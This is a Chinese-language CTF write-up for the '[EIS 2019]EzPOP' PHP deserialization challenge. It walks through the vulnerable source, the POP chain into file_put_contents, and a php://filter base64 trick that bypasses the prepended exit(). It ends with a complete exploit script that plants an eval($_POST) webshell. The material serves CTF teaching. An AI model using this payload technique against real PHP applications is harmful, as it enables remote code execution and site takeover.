2. 程式人生 > 其它 >[EIS 2019]EzPOP

[EIS 2019]EzPOP

阿新 發佈:2021-06-24

[EIS 2019]EzPOP

反序列化主要是利用原本類中的函式方法。關鍵點也在例項化後的類中變數可控後,通過構造變數的值,使反序列化後函式不斷呼叫最後到我們目標利用函式
然後再由利用函式中的引數值可控,幹一些好玩的操作。這個過程要關注函式的鏈式呼叫是否到了我們想要利用的漏洞函式。然後是可控的變數值是否成功傳入,中間是否進行了其他的處理。

這個題原始碼如下

<?php
error_reporting(0);

class A {

    protected $store;

    protected $key;

    protected $expire;

    public function __construct($store, $key = 'flysystem', $expire = null) {
        $this->key = $key;
        $this->store = $store;
        $this->expire = $expire;
    }

    public function cleanContents(array $contents) {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

    public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save() {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct() {
        if (!$this->autosave) {
            $this->save();
        }
    }
}

class B {

    protected function getExpireTime($expire): int {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string {
        return $this->options['prefix'] . $name;
    }

    protected function serialize($data): string {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool{
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 建立失敗
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //資料壓縮
            $data = gzcompress($data, 3);
        }

        $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }

        return false;
    }

}

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

$dir = "uploads/";

if (!is_dir($dir))
{
    mkdir($dir);
}
unserialize($_GET["data"]);

一次遇到這麼多程式碼不要怕,把每個函式的功能和呼叫關係理清楚,然後構造exp之後打斷點慢慢看,沒打通看是到哪個函式呼叫不下去了,報錯是什麼。

通讀之後,發現有2個類A(),B()

A中有__destruct,常見反序列化入口點,然後呼叫關係為__destruct->save()->getForStorage->cleanContents
然後再進行到save()中的$this->store->set($this->key, $contents, $this->expire);

進而開始呼叫B類中的set方法,

  public function set($name, $value, $expire = null): bool{
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 建立失敗
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //資料壓縮
            $data = gzcompress($data, 3);
        }

        $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }

        return false;
    }

set中前面呼叫的getxxx都是對變數資料型別進行處理的沒什麼好看的,然後是到了serialize方法

protected function serialize($data): string {
    if (is_numeric($data)) {
        return (string) $data;
    }

    $serialize = $this->options['serialize'];

    return $serialize($data);
}

這裡有個$serialize($data)函式動態呼叫

再到$data = gzcompress($data, 3)

,這裡由於if條件不滿足可以直接跳過

再到這個很明顯的漏洞地方

$data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
$result = file_put_contents($filename, $data);

我們可以利用file_put_contents寫入php檔案,直接getshell

這裡data前面拼接了<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n"

繞過exit可以參考p牛的這篇文章,

$filename=php://filter/convert.base64-encode/resource=xx.php就可以破壞掉exit(),

sprintf('%012d', $expire)

$expire可控

還讓我們可以填base64_decode,填充為4的倍數,讓php程式碼被正確解碼出來

$filename和$data都可控

它們在set中的處理過程:

$data = $this->serialize($value)


$filename = $this->getCacheKey($name)

    
$value和$name由set($name, $value, $expire = null)定義

由$this->store->set($this->key, $contents, $this->expire)傳入
在A類中key直接是可控的,
$contents=json_encode([$cleaned, $this->complete])
其中$cleaned = $this->cleanContents($this->cache);

所以$filename的值由A類中$key決定

$data由A類中的$cache$complete決定

(注意函式傳入變數的型別要求

構造exp

<?php

class A {

    protected $store;
    protected $key;
    protected $expire;
    public $cache = array(1234=>"UEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiSjNnblhTazdQejQ9");  /*<?php eval($_POST['x']);?>的二次base64編碼
        二次編碼的原因是json_enocde會將cache字串中的/和_進行轉義
        解密也有兩次,一次$serialize,一次php://fileter   */
    public $complete = "";
    
    public function __construct($store='', $key = 'flysystem', $expire = null) {
        $this->key = 'php://filter/convert.base64-decode/resource=x.php';
        $this->store = new B();
        $this->expire = $expire;
    }
}

class B {

    public $options =array('serialize'=>'base64_decode','expire'=>12346578910111) ;

}

$a = new A();
echo urlencode(serialize($a)).PHP_EOL;

x.php即為寫入的webshell

相關推薦

BUUCTF之[EIS 2019]EzPOP&BUUCTF[2020 新春紅包題]1 web

BUUCTF之[EIS 2019]EzPOP&BUUCTF[2020 新春紅包題]1 web 兩題是差不多的,只是一個函式稍微修改了,其中一個字尾不能為php,只要通過路徑穿越:filename=\'/../pz.php/.\';

[EIS 2019]EzPOP

[EIS 2019]EzPOP 反序列化主要是利用原本類中的函式方法。關鍵點也在例項化後的類中變數可控後,通過構造變數的值,使反序列化後函式不斷呼叫最後到我們目標利用函式

[EIS 2019]EzPOP 1

目錄 考察內容 解題思路 解題流程 新知識點 題目地址 考察內容 反序列化,檔案上傳,程式碼審計

PYPL程式語言排名2019年11月排行榜釋出:Python稱王,拉大與Java差距

PYPL(PopularitY of Programming Language,程式語言流行指數)11 月份的榜單已經發布了。PYPL 是非常流行的參考指標,其榜單資料的排名均是根據榜單物件在 Google 上相關的搜尋頻率進行統計排名,原始資料來自 Goo

2019年11月最新程式語言排行,C非常接近第一名的Java

TIOBE公佈了11月份程式語言排行榜。     本月前20名中有一些有趣的現象,先看看榜單:      首先,C現在非常接近Java,排在Java後指數僅差0.2%,預計年底之前C會再次衝上第一位;C++與Python已

2019年一線大廠JVM面試100問詳細解析!

前言 JVM(Java虛擬機器器)簡單來說就是執行Java程式碼的直譯器,作為螺絲釘程式設計師JVM其實瞭解下就差不多啦,不懂JVM內部細節照樣能寫出優質的程式碼!但是一到造火箭、飛機的場景(面試)不懂JVM的你,會被面試

1篇文章全面總結2019年Java面試知識,掌握這些你也能進大廠!

前言 2019年還有不到2個月的時間就結束了,這一年你收穫了沒?你成長了沒?改變了沒?年初給自己定下的目標實現了沒?

2019年Java面試題基礎系列228道(2),查漏補缺!

2019年Java面試題基礎系列228道 上一篇更新1~20題的答案解析 juejin.im/post/5de8c6… 本次更新Java 面試題(一)的21~50題答案

2019年Java面試題基礎系列228道(1),快看看哪些你還不會?

Java面試題(一) 1、面向物件的特徵有哪些方面? 2、訪問修飾符 public,private,protected,以及不寫(預設)時的區別?

2019年JVM面試都問了什麼?快看看這22道面試題!(附答案解析)

一. Java 類載入過程? Java 類載入需要經歷一下 7 個過程: 1. 載入 載入是類載入的第一個過程,在這個階段,將完成一下三件事情:

2019百度阿里Java面試題(基礎+框架+資料庫+分散式+JVM+多執行緒)

前言 很多朋友對面試不夠瞭解,不知道如何準備,對面試環節的設定以及目的不夠瞭解,因此成功率不高。通常情況下校招生面試的成功率低於1%,而社招的面試成功率也低於5%,所以對於候選人一定要知道設立面試的初衷以及

Java 9 ← 2017,2019 Java → 13 ,都發生了什麼?

距離 2019 年結束,只剩下 30 幾天了。你做好準備迎接 2020 年了嗎? 一到年底,人就特別容易陷入回憶和比較之中,比如說這幾天, 的對比挑戰就火了!

2019年Java併發精選面試題,哪些你還不會?(含答案和思維導圖)

Java 併發程式設計 1、併發程式設計三要素? 2、實現可見性的方法有哪些? 3、多執行緒的價值?

2019年Spring Boot面試都問了什麼?快看看這22道面試題!

Spring Boot 面試題 1、什麼是 Spring Boot? 2、Spring Boot 有哪些優點? 3、什麼是 JavaConfig?

2019年Java面試題基礎系列228道(3),查漏補缺!

2019年Java面試題基礎系列228道 第一篇更新1~20題的答案解析 juejin.im/post/5de8c6… 第二篇更新21~50題答案解析

PyCharm 2019.3釋出,增加了哪些新功能呢?

Python的IDE(Integrated Development Environment 整合開發環境)非常多,如:VS Code、Sublime、NotePad、Python自帶編輯器IDLE、JuPyter、Eclipse + PyDev等等,但是對於專案開發、管理、部署等稍微大一點的專案,

iOS 基於WebRTC的音視訊通訊 總結篇(2019最新)

公司要用webrtc進行音視訊通訊,參考了國內外眾多部落格和demo,總結一下經驗: webrtc官網

2019年Java面試題基礎系列228道(5),快看看哪些你還不會?

2019年Java面試題基礎系列228道 Java面試題(一) 第一篇更新1~20題的答案解析 juejin.im/post/5de8c6…

2019年Java面試題基礎系列228道(4),快看看哪些你還不會?

2019年Java面試題基礎系列228道 第一篇更新1~20題的答案解析 juejin.im/post/5de8c6… 第二篇更新21~50題答案解析

2019年末尾總結面試常問的基礎22道Java面試題,值得收藏學習!

1)集合類:List和Set比較,各自的子類比較(ArrayList,Vector,LinkedList;HashSet,TreeSet)